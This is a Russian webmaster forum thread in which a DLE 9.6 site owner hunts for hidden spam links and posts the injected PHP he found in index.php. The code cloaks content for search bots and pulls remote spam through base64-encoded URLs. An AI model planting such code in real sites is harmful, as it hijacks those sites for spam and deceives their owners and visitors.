- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрые люди, помогите найти левые ссылки на сайте dle 9.6.
В коде ничего не вижу, но в Яше в поиске они показываются.
Вот пример: http://yandex.ru/yandsearch?text=%D0%B2%D1%81%D0%B5%20%D0%B4%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B8%D0%B5%20%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%8B%20%D0%BF%D0%BE%20%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%BE%D0%BC%D1%83%20%D1%8F%D0%B7%D1%8B%D0%BA%D1%83%204%20%D0%BA%D0%BB%D0%B0%D1%81%D1%81%20%D0%B1%D0%B8%D0%B1%D0%BE%D0%BB%D0%B5%D1%82%D0%BE%D0%B2%D0%B0%20%202013&lr=193&time_from=-3dE
(сайт на данный момент выводится на 10 позиции). Вот ссылка на сайт: http://clck.ru/8h5Uc
Вот лишние словечки: Гениальные темы wordpress и шаблоны вордпресс. Популярные игры онлайн для домашнего отдыха. … Хочу себе такую машинку. Рестайлинг Калины kalina-forum.ru ожидается уже в 2013 году.
narvel, или вирус или шаблон такой. А не видите скорее всего потому что они выводятся незарегенным юзерам. Читайте прилепленный топик.
чет я ничего в коде не вижу из указанно в стартпосте
хотя вижу
хакнули, че, надо код двигла копать, обычно все стандартно - config/dbconfig.php в первую очередь проверьте, может шелл в папке uploads.. вариантов окиян
Я смотрел, не залогинившись.
Погуглил по этим строкам, есть еще сайты зараженные.
---------- Добавлено 13.06.2013 в 17:58 ----------
чет я ничего в коде не вижу из указанно в стартпосте
хотя вижу
хакнули, че, надо код двигла копать, обычно все стандартно - config/dbconfig.php в первую очередь проверьте, может шелл в папке uploads.. вариантов окиян
http://i47.fastpic.ru/big/2013/0613/a4/36cae81264b62e5c2153aaa60acf7ca4.jpg
Сайт только вчера выложил, видимо было что-то изначально...
---------- Добавлено 13.06.2013 в 18:12 ----------
Скачал сайт на компьютер, в тотале просмотрел на наличие этих слов - пусто. Видимо в зашифрованном виде, но где ???
Очень прошу помочь.
---------- Добавлено 13.06.2013 в 18:57 ----------
Помогите решить проблему. Работу оплачу.
---------- Добавлено 13.06.2013 в 19:43 ----------
Скачал демо версию dle 9.6 и сравнил файлы index.php и нашел вот эти подозрительные строчки в моем файле, которые отсутствовали в оригинальном.
$cronstat='';
if ( preg_match ( '#google|msn|live|altavista|ask|yahoo|aol|yandex|rambler|mail|solomon#smi', $_SERVER['HTTP_USER_AGENT'])){
$post_contents = $db->super_query("SELECT * FROM ".PREFIX."_notice WHERE id=8000000",true);
$tmpx=explode('|z|',$post_contents[0]['notice']);
if ((($tmpx[0]+86400)<time())||!$tmpx[0])
{
$stasinfo=@file_get_contents(base64_decode('aHR0cDovL25hMTAwLnJ1L2RsZS8xd2luLnR4dA=='));
if (!$stasinfo){$stasinfo=$tmpx[1];}
$db->query( "DELETE FROM ".PREFIX."_notice WHERE id=8000000");
$db->query("INSERT INTO ".PREFIX."_notice ( id, user_id, notice) VALUES (8000000, 8000000, '".time()."|z|".$db->safesql($stasinfo)."');");
$post_id_stat=(base64_decode('aHR0cDovL25hMTAwLnJ1L2RsZS9zdGF0cy5waHA/aG9zdD0=')).$_SERVER['HTTP_HOST'];
@file_get_contents($post_id_stat);
$cronstat=$stasinfo;
}
else {
$cronstat= $tmpx[1];
}
}